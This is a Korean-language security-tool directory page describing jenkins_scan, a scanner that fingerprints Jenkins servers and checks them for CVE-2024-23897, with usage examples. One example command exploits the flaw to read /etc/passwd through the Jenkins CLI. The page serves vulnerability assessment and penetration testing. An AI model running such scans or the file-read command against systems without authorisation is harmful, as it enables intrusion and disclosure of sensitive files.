Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
jenkins_scan — Jenkins 환경을 탐지하고 CVE-2024-23897 취약점을 확인합니다. | Kitploit
도구/GitHubGitHub/w41l3r/jenkins_scan
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubw41l3r/jenkins_scan

jenkins_scan

Jenkins 환경을 탐지하고 CVE-2024-23897 취약점을 확인합니다.

저장소 보기
4개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

jenkins_scan

Jenkins 환경을 감지하고 CVE-2024-23897을 확인합니다.

작동 방식

Jenkins 감지

다음 경로를 테스트합니다: /, /login, /oops, /api/json, /cli, /jenkins/, /jenkins/api/json

다음을 통해 식별합니다:

  1. X-Jenkins 헤더 — 가장 신뢰할 수 있으며 버전도 반환합니다.
  2. X-Hudson 헤더 — 오래된 인스턴스
  3. HTML 본문 — "login to jenkins", "hudson.model" 등의 문자열
  4. /api/json — JSON 구조(_class, jobs, views)를 통해 확인

CVE-2024-23897 확인

수동(기본값): 감지된 버전을 임계값과 비교합니다:

  • Weekly: < 2.442 → 취약
  • LTS: < 2.426.3 → 취약

활성(--active): Jenkins CLI 바이너리 프로토콜 핸드셰이크를 HTTP로 전송합니다. 서버가 200 + Content-Type: application/octet-stream으로 응답하면, CLI 채널이 열려 있고 익스플로잇이 적용 가능함을 확인합니다.

사용법

기본 스캔

python jenkins_scan.py -f urls.txt

활성 프로브 + Burp 프록시 + 파일 출력

python jenkins_scan.py -f urls.txt --active --proxy http://127.0.0.1:8080 -o resultados.txt

20개 스레드, 상세 출력, 색상 없음(파이프/grep용)

python jenkins_scan.py -f urls.txt -t 20 -v --no-color

취약한 대상에서 익스플로잇을 수동으로 확인

java -jar jenkins-cli.jar -s http://TARGET/ who-am-i "@/etc/passwd"

도구 다운로드